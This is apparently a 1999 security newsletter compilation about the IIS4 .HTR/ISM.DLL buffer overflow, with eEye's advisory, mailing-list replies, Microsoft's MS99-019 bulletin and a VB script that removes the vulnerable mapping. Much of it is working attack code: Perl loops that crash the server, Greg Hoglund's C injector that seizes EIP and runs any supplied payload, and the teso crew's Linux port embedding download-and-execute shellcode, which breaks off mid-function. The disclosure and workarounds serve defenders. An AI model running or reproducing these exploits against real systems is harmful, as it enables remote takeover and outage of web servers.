DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one of the following methods to contact CIAC: 1. Call the CIAC voice number 925-422-8193 and leave a message, or 2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or 3. Send e-mail to 4498369@skytel.com, or 4. Call 800-201-9288 for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority - time critical information and Bulletins, important computer security information; 2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name: E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov: subscribe list-name e.g., subscribe ciac-bulletin You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question. If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc. PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) J-034: Cisco 7xx TCP and HTTP Vulnerabilities J-035: Linux Blind TCP Spoofing J-036: LDAP Buffer overflow against Microsoft Directory Services J-037: W97M.Melissa Word Macro Virus J-038: HP-UX Vulnerabilities (hpterm, ftp) J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES J-040: HP-UX Security Vulnerability in sendmail J-041: Cisco IOS(R) Software Input Access List Leakage with NAT J-042: Web Security J-043: (bulletin in process) -----BEGIN PGP SIGNATURE----- Version: 4.0 Business Edition iQCVAwUBN2E1nLnzJzdsy3QZAQGZWAP+LLkyHUQVu8iWeoAh8XMUNy+vEl0ysRFI iuSI9J+O/gTFwLMPugKeYOvFrLUs1/EPM4YH8zduPQHyMk/+0s2Jz3icj13d3Oc5 9SRB1vAYtridVzjAU1XwXUj8xzzdyx//8qSygt69tfJm1kEweR70AAXwUhGY2pus kZ2eTla3ldU= =h3+v -----END PGP SIGNATURE----- @HWA 111.0 The IIS4 eEye security advisory and threads as mentioned previously ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Retina vs. IIS4, Round 2, KO eEye - Digital Security Team (eeye@EEYE.COM) Tue, 15 Jun 1999 12:18:16 -0000 Retina vs. IIS4, Round 2 Systems Affected: Internet Information Server 4.0 (IIS4) Microsoft Windows NT 4.0 SP3 Option Pack 4 Microsoft Windows NT 4.0 SP4 Option Pack 4 Microsoft Windows NT 4.0 SP5 Option Pack 4 Release Date: June 8, 1999 Advisory Code: AD06081999 Description: We have been debating how to start out this advisory. How do you explain that 90% or so of the Windows NT web servers on the Internet are open to a hole that lets an attacker execute arbitrary code on the remote web server? So the story starts... The Goal: Find a buffer overflow that will affect 90% of the Windows NT web servers on the Internet. Exploit this buffer overflow. The Theory: There will be overflows in at least one of the default IIS filtered extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take place is that IIS will pass the full URL to the DLL that handles the extension. Therefore if the ISAPI DLL does not do proper bounds checking it will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to execute arbitrary code on the remote server. Entrance Retina: At the same time of working on this advisory we have been working on the AI mining logic for Retina's HTTP module. What better test scenario than this? We gave Retina a list of 10 or so extensions common to IIS and instructed it to find any possible holes relating to these extensions. The Grind: After about an hour Retina found what appeared to be a hole. It displayed that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server. We all crossed our fingers, started up the good ol' debugger and had Retina hit the server again. Note: [overflow] is 3k or so characters... but we will not get into the string lengths and such here. View the debug info and have a look for yourself. The Registers: EAX = 00F7FCC8 EBX = 00F41130 ECX = 41414141 EDX = 77F9485A ESI = 00F7FCC0 EDI = 00F7FCC0 EIP = 41414141 ESP = 00F4106C EBP = 00F4108C EFL = 00000246 Note: Retina was using "A" (0x41 in hex) for the character to overflow with. If you're not familiar with buffer overflows a quick note would be that getting our bytes into any of the registers is a good sign, and directly into EIP makes it even easier :) Explain This: The overflow is in relation to the .HTR extensions. IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers. Looks like we got our 90% of the Windows NT web servers part down. However, can we exploit this? The Exploit: Yes. We can definitely exploit this and we have. We will not go into much detail here about how the buffer is exploited and such. Read the comments in the asm file for more information. However, one nice thing to note is that the exploit has been crafted in such a way to work on SP4 and SP5 machines, therefore there is no guessing of offsets and possible accidental crashing of the remote server. We have not tested the exploit on SP3 and would love to know if it works or not. eMail alert@eEye.com if you've successfully exploited this hole on SP3. For more details about the exploit visit the eEye web site at www.eEye.com The Fallout: Almost 90% of the Windows NT web servers on the Internet are affected by this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves. No, we did not try it on the above mentioned. But it is easy to verify if a web server is exploitable without using the exploit. Even a server that's locked in a guarded room behind a Cisco Pix can be broken into with this hole. This is a reminder to all software vendors that testing for common security holes in your software is a must. Demand more from your software vendors. The Request. (Well one anyway.) Dear Microsoft, One of the things that we found out is that IIS did not log any trace of our attempted hack. We recommend that you pass all server requests to the logging service before passing it to any ISAPI filters etc...The logging service should be, as named, an actual service running in a separate memory space so that when inetinfo goes down intrusion signatures are still logged. Retina vs. IIS4, Round 2. KO. Fixes: 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just updated their checklist to include this interim fix. http://microsoft.com/security/products/iis/CheckList.asp 2. Apply the patch supplied by Microsoft when available. http://microsoft.com/security Vendor Status: We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided all information needed to reproduce the exploit. and how to fix it. Microsoft security team did confirm the exploit and are releasing a patch for IIS. Related Links Advisory - On our web site http://www.eEye.com/database/advisories/ad06081999/ad06081999.html Advisory - Retina Brain File used to uncover the hole http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html Retina - The Network Security Scanner http://www.eEye.com/retina/ Greetings go out to: The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN and any other security company or organization that believes in full disclosure. Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com -------------------------------------------------------------------------------- Date: Tue, 15 Jun 1999 18:23:28 -0000 From: eEye - Digital Security Team Subject: Update to IIS Remote Hole. We have updated our advisory on our website, http://www.eeye.com/database/advisories/ad06081999/ad06081999.html and as promised added a link to the working remote exploit, http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html Signed, eEye Digital Security Team http://www.eEye.com -------------------------------------------------------------------------------- Re: Retina vs. IIS4, Round 2, KO Ryan R Permeh (rrpermeh@RCONNECT.COM) Tue, 15 Jun 1999 17:01:23 -0500 tested, this works for me... scripting was turned on... perl exploit code follows: #!/usr/bin/perl #props to the absu crew use Net::Telnet; for ($i=2500;$i<3500;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80); my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n"; print "$cmd\n";$obj->print("$cmd"); $obj->close; } -- ---------------------------------------------------------------- Ryan R Permeh E-MAIL: rrpermeh@rconnect.com IS Engineer WEB : http://www.rconnect.com Rural Connections HELP : help@rconnect.com FAQ : http://www.rconnect.com/help SALES : sales@rconnect.com ---------------------------------------------------------------- 120 First Street NE PHONE : (507) 281-5005 Rochester, MN 55906 FAX : (507) 281-9272 -------------------------------------------------------------------------------- Re: Retina vs. IIS4, Round 2, KO Randal L. Schwartz (merlyn@STONEHENGE.COM) Tue, 15 Jun 1999 16:59:08 -0700 >>>>> "Ryan" == Ryan R Permeh writes: Ryan> #!/usr/bin/perl Ryan> #props to the absu crew Ryan> use Net::Telnet; Ryan> for ($i=2500;$i<3500;$i++) Ryan> { Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80); Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n"; Ryan> print "$cmd\n";$obj->print("$cmd"); Ryan> $obj->close; Ryan> } It's silly to use Net::Telnet for HTTP: use LWP::Simple; for ($i = 2500; $i <= 3500; $i++) { warn "$i\n"; get "http://$ARGV[0]/".('a' x $i).".htr"; } -- Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095 Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying Email: Snail: (Call) PGP-Key: (finger merlyn@teleport.com) Web: My Home Page! Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me -------------------------------------------------------------------------------- http://www.microsoft.com/security/bulletins/ms99-019.asp Microsoft Security Bulletin (MS99-019) Patch Available for Malformed HTR Request Vulnerability Originally Posted: May 27, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in Microsoft (r) Internet Information Server 4.0. The vulnerability could allow denial of service attacks against an IIS server or, under certain conditions, could allow arbitrary code to be run on the server. Microsoft has issued this bulletin to advise customers of steps they can take to protect themselves against this vulnerability. A patch to eliminate this vulnerability is being developed, and an update to this bulletin will be released to advise customers when it is available. Issue ===== IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords. The vulnerability involves an unchecked buffer in ISM.DLL. This poses two threats to safe operation. The first is a denial of service threat. A malformed request for an .HTR file could overflow the buffer, causing IIS to crash. The server would not need to be rebooted, but IIS would need to be restarted. The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing this bulletin to allow customers to take appropriate action to protect themselves against it. Affected Software Versions ========================== - Microsoft Internet Information Server 4.0 What Microsoft is Doing ======================= Microsoft has provided a workaround that fixes the problem identified. The workaround is discussed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. What Customers Should Do ======================== Microsoft highly recommends that customers disable the script mapping for .HTR files as follows: - From the desktop, start the Internet Service Manager by clicking Start | Programs | Windows NT 4.0 Option Pack | Microsoft Internet Information Server | Internet Service Manager - Double-click "Internet Information Server" - Right-click on the computer name and select Properties - In the Master Properties drop-down box, select "WWW Service", then click the "Edit" button . - Click the "Home Directory" tab, then click the "Configuration" button. - Highlight the line in the extension mappings that contains ".HTR", then click the "Remove" button. - Respond "yes" to "Remove selected script mapping?" say yes, click OK 3 times, close ISM A patch will be available shortly to eliminate the vulnerability altogether. Customers should monitor http://www.microsoft.com/security for an announcement when the patches are available. Microsoft recommends that customers review the IIS Security Checklist at http://www.microsoft.com/security/products/iis/CheckList.asp More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-019, Workaround Available for "Malformed HTR Request" Vulnerability (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-019.asp. - IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Revisions ========= - June 15, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security ------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 12:12:33 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: Update to IIS Remote Hole. Nelson Bunker has provided us with an VB app which automates the process of updating your IIS 4.0 Metabase to remove the ISM.DLL mappings which permit the eEye IISHack to work. Its a temporary workaround while Microsoft continue to work on a proper fix (which is expected today or tomorrow btw). For those of you with large IIS installation, you might find this extremely useful. If you use it, make sure you drop Nelson a line and thank him for it! Check the NTBugtraq Home Page, http://ntbugtraq.ntadvice.com, in the "What's New" section for links. Cheers, Russ - NTBugtraq Editor For those of you that have too many IIS machines to yank this off by hand here is some vb code to set your IIS metabase remotely... VB 5.0 sp3 IIS Resource kit installed -- Metabase editor utility from resource kit needs to be installed. Have fun! You can set all of you metabase up with the tools mentioned above. :-) Nelson Bunker 'The subs I put in Modules handles the App Mappings tab of the 'application configuration screen Sub AppMappings(ByRef IIS) 'delete all existing script paths Call DeleteAllLowerProperties(IIS, "ScriptMaps") 'the only thing changed on scripts maps is htm & html mapped to 'asp.dll and removed the ism.dll mapping newscriptmaps = Array(".asa,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".html,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".asp,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".cdx,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".cer,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".htm,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", ".htw,C:\WINNT\System32\webhits.dll,3;", ".ida,C:\WINNT\System32\idq.dll,3;", ".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1;", ".idq,C:\WINNT\System32\idq.dll,3;", ".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1;", ".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1;", ".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1") IIS.PutEx 2, "ScriptMaps", newscriptmaps IIS.SetInfo End Sub Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName) 'delete all existing script paths PathList = IIS.GetDataPaths(PropertyName, 1) If Err.Number <> 0 Then For Each Path In PathList Set objScriptPath = GetObject(Path) objScriptPath.PutEx 1, PropertyName, True Next End If End Sub ' Start form1 here Function GetServerArray() GetServerArray = Array("Websvr1", ...., "WebsvrX") End Function Private Sub Form_Load() ServerArray = GetServerArray() For Each Server In ServerArray Set globalW3svc = GetObject("IIS://" & Server & "/W3SVC") Call AppMappings(globalW3svc) Next End Sub -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 08:58:05 -0700 From: Greg Hoglund To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: IIS Remote Exploit (injection code) I read yesturday on eEye.com that they had discovered a buffer overflow in IIS. I could not resist writing an exploit. I did not have time to design a really cool payload for this exploit, so I simply wrote the injection code. However, this is meaningful for several reasons. Attached is the injection code. The exploit will deliver any payload of your choosing. Your payload will be executed. This empowers you to create a "collection" of payloads that are not dependant upon the injection vector in any way. This decoupling is important for military needs, where a single injection vector needs to work, but the "warhead" may be different depending on the targets characterization. The exploit was fairly simple to build. In short, I read on eEye.com that they had overflowed IIS with something like a ~3000 character URL. Within minutes I had caused IIS to crash with EIP under my control. I used a special pattern in the buffer (see code) to make it easy for me to identify where EIP was being popped from. The pattern also made it easy to determine where I was jumping around. Use the tekneek Danielson. ;-) So, I controlled EIP, but I needed to get back to my stack segment, of course. This is old school, and I really lucked out. Pushed down two levels on the stack was an address for my buffer. I couldn't have asked for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could return to. It had two pop's followed by a return. This made my injection vector return to the value that was stored two layers down on the stack. Bam, I was in my buffer. So, I landed in a weird place, had to add a near jump to get to somewhere more useful.. nothing special, and here we are with about 2K of payload space. If you don't supply any mobile code to be run, the injection vector will supply some for you. The default payload in simply a couple of no-ops followed by a debug breakpoint (interrupt 3)... It's easy to play with if you want to build your own payloads.. just keep a debugger attached to inetinfo.exe on the target machine. Lastly, I would simply like to point out that monoculture installations are very dangerous. It's a concept from agribusiness.. if you have all one crop, and a virus comes along that can kill that crop, your out of business. With almost ALL of the IIS servers on the net being vulnerable to this exploit, we also have a monoculture. And, it's not just IIS. The backbone of the Internet is built on common router technology (such as cisco IOS). If a serious exploit comes along for the IOS kernel, can you imagine the darkness that will fall? <--- snip // IIS Injector for NT // written by Greg Hoglund // http://www.rootkit.com // // If you would like to deliver a payload, it must be stored in a binary file. // This injector decouples the payload from the injection code allowing you to // create a numnber of different attack payloads. This code could be used, for // example, by a military that needs to attack IIS servers, and has characterized // the eligible hosts. The proper attack can be chosen depending on needs. Since // the payload is so large with this injection vector, many options are available. // First and foremost, virii can delivered with ease. The payload is also plenty // large enough to remotely download and install a back door program. // Considering the monoculture of NT IIS servers out on the 'Net, this represents a // very serious security problem. #include #include #include void main(int argc, char **argv) { SOCKET s = 0; WSADATA wsaData; if(argc < 2) { fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \ "http://www.rootkit.com\nUsage: %s \n", argv[0]); exit(0); } WSAStartup(MAKEWORD(2,0), &wsaData); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons(80); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr))) { static char theSploit[4096]; // fill pattern char kick = 'z'; //0x7a char place = 'A'; // my uber sweet pattern gener@t0r for(int i=0;i<4096;i+=4) { theSploit[i] = kick; theSploit[i+1] = place; theSploit[i+2] = place + 1; theSploit[i+3] = place + 2; if(++place == 'Y') // beyond 'XYZ' { place = 'A'; if(--kick < 'a') kick = 'a'; } } _snprintf(theSploit, 5, "get /"); _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0"); // after crash, looks like inetinfo.exe is jumping to the address // stored @ location 'GHtG' (0x47744847) // cross reference back to the buffer pattern, looks like we need // to store our EIP into theSploit[598] // magic eip into NTDLL.DLL theSploit[598] = (char)0xF0; theSploit[599] = (char)0x8C; theSploit[600] = (char)0xF8; theSploit[601] = (char)0x77; // code I want to execute // will jump foward over the // embedded eip, taking us // directly to the payload theSploit[594] = (char)0x90; //nop theSploit[595] = (char)0xEB; //jmp theSploit[596] = (char)0x35; // theSploit[597] = (char)0x90; //nop // the payload. This code is executed remotely. // if no payload is supplied on stdin, then this default // payload is used. int 3 is the debug interrupt and // will cause your debugger to "breakpoint" gracefully. // upon examiniation you will find that you are sitting // directly in this code-payload. if(argc < 3) { theSploit[650] = (char) 0x90; //nop theSploit[651] = (char) 0x90; //nop theSploit[652] = (char) 0x90; //nop theSploit[653] = (char) 0x90; //nop theSploit[654] = (char) 0xCC; //int 3 theSploit[655] = (char) 0xCC; //int 3 theSploit[656] = (char) 0xCC; //int 3 theSploit[657] = (char) 0xCC; //int 3 theSploit[658] = (char) 0x90; //nop theSploit[659] = (char) 0x90; //nop theSploit[660] = (char) 0x90; //nop theSploit[661] = (char) 0x90; //nop } else { // send the user-supplied payload from // a file. Yes, that's a 2K buffer for // mobile code. Yes, that's big. FILE *in_file; in_file = fopen(argv[2], "rb"); if(in_file) { int offset = 650; while( (!feof(in_file)) && (offset < 3000)) { theSploit[offset++] = fgetc(in_file); } fclose(in_file); } } send(s, theSploit, strlen(theSploit), 0); } closesocket(s); } } -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 10:59:38 -0000 From: Marc To: BUGTRAQ@netspace.org Subject: Update to IIS hole. Hi, We have been receiving some eMails from people saying that the iishack.exe on our website is not working for them and is just crashing the remote server. Here is what we know and do not know etc.. We have tested it on the English version of NT4.0, with IIS4.0, Service Pack 4 and 5. We have had some people eMail us that they have this configuration and it is not working... This very well could be possible that the offset we are using is not working for some dll's and such... people might have a different version and what not. For this case we *might* release a second exploit that uses a better offset that should work on all nt4.0 iis4.0 sp4 and sp5 machines but honestly it is not that big of a deal to us. The hole is there, and is exploitable and other people have been writing exploits for it also. We do know that our exploit probably does not work on sp3 because off the offset we use... we have gotten a few eMails about this and we never did test nor claim it worked on sp3 but we *might* in our second version of the exploit find a offset that works for sp3 also. I honestly think this post is in some ways pointless but maybe it will help to cut back some of the eMails we are getting about the above information. Thank you to everyone who has been helping out. Signed, Marc eEye Digital Security Team http://www.eEye.com P.S. Jump on over to technotronic.com for some good information and other exploits and such. -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 19:04:20 +0200 (CEST) From: typo To: bugtraq@netspace.org Cc: packetstorm@genocide2600.com Subject: iis4 remote exploit ported the teso crew has ported the iis exploit to linux... basically this program does the same as the windows version (written in asm) of this exploit. Produced shellcode is identical.. everything should work.. we haven't tested. Everyone except rootshell.com is allowed to put a copy of this on his/her/their webpage. visit #austria on ircnet for newest elite 0day exploits. scut & typo /* iis 4.0 exploit * by eeye security * * ported to unix/C by the teso crew. * * shoutouts to #hax and everyone else knowing us... * you know who you are. * * gcc -o tesoiis tesoiis.c -Wall */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip, unsigned short int sourceport, int sec); void net_write (int fd, const char *str, ...); unsigned long int net_resolve (char *host); char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */ #define URL_OFFSET 1055 char front[] = "GET /AAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "\x41\x41\x41\x41\x41\x41\xb0\x87\x67\x68\xb0\x87" "\x67\x68\x90\x90\x90\x90\x58\x58\x90\x33\xc0\x50" "\x5b\x53\x59\x8b\xde\x66\xb8\x21\x02\x03\xd8\x32" "\xc0\xd7\x2c\x21\x88\x03\x4b\x3c\xde\x75\xf4\x43" "\x43\xba\xd0\x10\x67\x68\x52\x51\x53\xff\x12\x8b" "\xf0\x8b\xf9\xfc\x59\xb1\x06\x90\x5a\x43\x32\xc0" "\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43\x52\x51" "\x53\x56\xb2\x54\xff\x12\xab\x59\x5a\xe2\xe6\x43" "\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43" "\x52\x53\xff\x12\x8b\xf0\x5a\x33\xc9\x50\x58\xb1" "\x05\x43\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75" "\xf4\x43\x52\x51\x53\x56\xb2\x54\xff\x12\xab\x59" "\x5a\xe2\xe6\x33\xc0\x50\x40\x50\x40\x50\xff\x57" "\xf4\x89\x47\xcc\x33\xc0\x50\x50\xb0\x02\x66\xab" "\x58\xb4\x50\x66\xab\x58\xab\xab\xab\xb1\x21\x90" "\x66\x83\xc3\x16\x8b\xf3\x43\x32\xc0\xd7\x3a\xc8" "\x75\xf8\x32\xc0\x88\x03\x56\xff\x57\xec\x90\x66" "\x83\xef\x10\x92\x8b\x52\x0c\x8b\x12\x8b\x12\x92" "\x8b\xd7\x89\x42\x04\x52\x6a\x10\x52\xff\x77\xcc" "\xff\x57\xf8\x5a\x66\x83\xee\x08\x56\x43\x8b\xf3" "\xfc\xac\x84\xc0\x75\xfb\x41\x4e\xc7\x06\x8d\x8a" "\x8d\x8a\x81\x36\x80\x80\x80\x80\x33\xc0\x50\x50" "\x6a\x48\x53\xff\x77\xcc\xff\x57\xf0\x58\x5b\x8b" "\xd0\x66\xb8\xff\x0f\x50\x52\x50\x52\xff\x57\xe8" "\x8b\xf0\x58\x90\x90\x90\x90\x50\x53\xff\x57\xd4" "\x8b\xe8\x33\xc0\x5a\x52\x50\x52\x56\xff\x77\xcc" "\xff\x57\xec\x80\xfc\xff\x74\x0f\x50\x56\x55\xff" "\x57\xd8\x80\xfc\xff\x74\x04\x85\xc0\x75\xdf\x55" "\xff\x57\xdc\x33\xc0\x40\x50\x53\xff\x57\xe4\x90" "\x90\x90\x90\xff\x6c\x66\x73\x6f\x66\x6d\x54\x53" "\x21\x80\x8d\x84\x93\x86\x82\x95\x21\x80\x8d\x98" "\x93\x8a\x95\x86\x21\x80\x8d\x84\x8d\x90\x94\x86" "\x21\x80\x8d\x90\x91\x86\x8f\x21\x78\x8a\x8f\x66" "\x99\x86\x84\x21\x68\x8d\x90\x83\x82\x8d\x62\x8d" "\x8d\x90\x84\x21\x78\x74\x70\x64\x6c\x54\x53\x21" "\x93\x86\x84\x97\x21\x94\x86\x8f\x85\x21\x94\x90" "\x84\x8c\x86\x95\x21\x84\x90\x8f\x8f\x86\x84\x95" "\x21\x88\x86\x95\x89\x90\x94\x95\x83\x9a\x8f\x82" "\x8e\x86\x21\x90\x98\x8f\x4f\x86\x99\x86\x21" /* stick it in here */ "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21" "\x21\x21\x21" ".htr HTTP/1.0"; void usage (void) { printf ("usage: ./tesoiis host port url\n"); exit (EXIT_FAILURE); } int main (int argc, char *argv[]) { /* yadda,yadda.. you can try exploiting our exploit!! * update: hmm.. is this exploitable? gets EIP touched by exit()? * gotta check this later... */ char host[256], url[256]; int port,sd,t = 0; int m = 0; char *cc, *pfft; struct sockaddr_in cs; printf ("teso crew IIS exploit.. shellcode by eEye.\n"); printf ("------------------------------------------\n"); if (argc < 4) usage(); strcpy (host, argv[1]); strcpy (url, argv[3]); port = atoi (argv[2]); if ((port < 1) || (port > 65535)) usage(); cc = url; pfft = front + URL_OFFSET; while (*cc) { if (*cc == '/' && 0 == t) { memcpy (pfft, stuff, 6); pfft += 6; t = 1; } else { *pfft = *cc + 0x21; pfft++; } cc++; m += 1; } printf ("Host: %s Port: %d Url: %s\n", host, port, url); printf ("Connecting... "); fflush (stdout); sd = net_connect (&cs, host, port, NULL, 0, 30); if (sd < 1) { printf ("failed!\n"); exit (EXIT_FAILURE); 